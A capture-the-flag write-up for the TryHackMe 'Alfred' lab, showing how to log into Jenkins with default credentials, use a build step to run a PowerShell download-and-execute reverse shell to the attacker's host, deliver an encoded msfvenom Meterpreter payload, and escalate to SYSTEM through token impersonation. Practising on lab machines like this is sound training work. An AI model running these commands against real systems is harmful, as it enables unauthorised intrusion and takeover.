The Alfred room on TryHackMe focuses on exploiting Jenkins. A commonly misconfigured automation tool that developers use for continuous integration/deployment.
Alfred is a subscription only room.
Initial access
This task requires you to deploy the machine and load up Nishang to gain initial access. Nishang is a framework and a collection of scripts and payloads which enable usage of PowerShell for offensive security by nikhil_mitt.
Nmap (TCP)
Start by scanning the machine with nmap. This way, we can see what ports are open.
nmap 10.10.160.207
This will reveal that there are 3 open ports. Ports 80, 3389, 8080.
Get Credentials
Referring back to the nmap scan, there are 2 http services. Let’s check these out.
Note: there are two services; one on port 80, and another on port 8080.
10.10.160.207:80
10.10.160.207:8080
This task requires us to crack the Jenkins login, on port 8080 specifically.
Jenkins default credentials
A simple Google search reveals the default admin username for Jenkins is “admin“.
After toying around with a few admin:password potentials–first trying some Batman-related passwords, i.e. Bruce, Wayne, Joker .etc– I stumbled on the password before loading up some brute force tools.
The password is.. you guessed it.. admin.
The username:password flag is admin:admin.
Jenkins exploit
No that we’ve gained access to Jenkins, lets look for some remote code execution vulns.
The script first requires us to start a python server that the site can download the script from.
The Powershell script we need to download is available at the top of the page.
Start Python server
python3 -m http.server
This will make the directory, where the command was run, accessible on 0.0.0.0:8000.
Also accessible on your localhost IP, found via ip addr command.
So let’s download the PowerShell script (above) and then run the given script. Then, the Jenkins console can download the PowerShell script and run it on the target machine.
RCE Vulnerability
TryHackMe provides a command for us to run on the host.
powershell iex (New-Object Net.WebClient).DownloadString('http://your-ip:your-port/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress your-ip -Port your-port
Of course, swap your-ip and your-port.
So, at first, I toyed with the Script Console, attempting to exploit some Java scripts to download and run the above PowerShell script.
But, gave up on this after figuring out you can run a shell script in the build options for the project.
The script here will run on build.
Wait for it to finish.
Then, we need to run a netcat listener. On the port we gave. Run the following command.
nc -l -p 1337
And rebuild the Jenkins project again.
And.. we’re in!
From here, we need to find the user.txt flag.
User flag
Using some general knowledge, we should cd .. up through the system.
And eventually, we see something that clicks. C:\Users\bruce
And finally, we find the user.txt file. And the flag.
Meterpreter
Task 2 sees us generating an msfvenom payload. Running the following command.
msfvenom -p windows/meterpreter/reverse_tcp -a x86 – encoder x86/shikata_ga_nai LHOST=[IP] LPORT=[PORT] -f exe -o [SHELL NAME].exe
I’d tried to download and run the msfvenon payload via the previous shell that we’d gotten, but to no avail.
The flag: is about the size of the msfvenom payload. We can see this by running the ls -la command. It’s 73802 bytes.
Instead, I found success by running it through the same build options we exploited earlier. But with the new payload.
powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.11.8.219:8000/theJoker.exe','theJoker.exe')"
Before going through the build process, we need to launch the Metasploit “listener”. By running msfconsole, then using the the exploit/multi/handler, with the payload we using the previous msfcommand, windows/meterpreter/reverse_tcp.
Now we’re listening, we can run the build on Jenkins.
After rebuilding, we see the meterpreter session opens successfully.
Privilege Escalation
Ugh, this was a bit of a nightmare.
So, flip the build options BACK to the original netcat route we took. Start a listener nc -l -p 1234.
Once you get shell, then, run the given powershell command from TryHackMe.
powershell "(New-Object System.Net.WebClient).Downloadfile('http://<ip>:8000/shell-name.exe','shell-name.exe')"
Make sure not to cd out of the folder.
Just Start-Process "theJoker.exe" to run the msfvenom payload.
Make sure you’re running the msfconsole exploit exploit/multi/handler for shell.
From here, we can execute the command shell for shell.
Then we can see all privileges with whoami /priv
To escape the shell, just hit Ctrl+C.
Then, we can load the incognito module to exploit two of the enabled privileges, using load incognito.
Lets see what tokens are available with list_tokens -g.
From here, we see that the BUILTIN\Administrators tokens are available and can be impersonated.
After running the command impersonate_token BUILTIN\\ADMINISTRATORS we get the required output. Note, the double backslash escapes the backslash.
The above confirms we’re impersonating NT AUTHORITY\SYSTEM.
However, despite us impersonating someone with authority. Our process might not have authority. So let’s grab the PID of the services.exe process and then migrate to that process.
Fire off the command ps | grep services.exe
Then take the PID number–probably different for you–then run the migrate command to “move to” that process owned by the user we’re impersonating.
Now we’ve escalated privilege, to get the root flag, we need to cd C:\Windows\System32\config , then cat root.txt.
